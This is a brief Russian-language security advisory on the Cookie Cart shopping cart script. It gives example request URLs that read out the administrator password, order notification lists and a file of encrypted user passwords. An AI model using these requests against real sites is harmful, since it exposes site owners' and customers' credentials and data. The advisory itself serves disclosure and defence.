Программа: Cookie Cart

Уязвимость позволяет удаленному
пользователю получить потенциально важные
данные других пользователей. Удаленный
пользователю может запросить сценарии ‘testmy.cgi’
и ‘testmy.pl’ и получить административный пароль
и список ‘Order Notification’.

Пример:

http://[target]/cart/cgi/testmy.cgi?testmycgi=/cart/ cgi/testmy.cgi&path=/cart/dbase_ven/&run=yes

http://[target ]/cart/dbase_ven/[vendor_ #number-notification.txt]

Удаленный пользователь может также
скачать файл с зашифрованными паролями
пользователей.

Пример:

http://[target]/cart/data/passwd.txt



Оставить мнение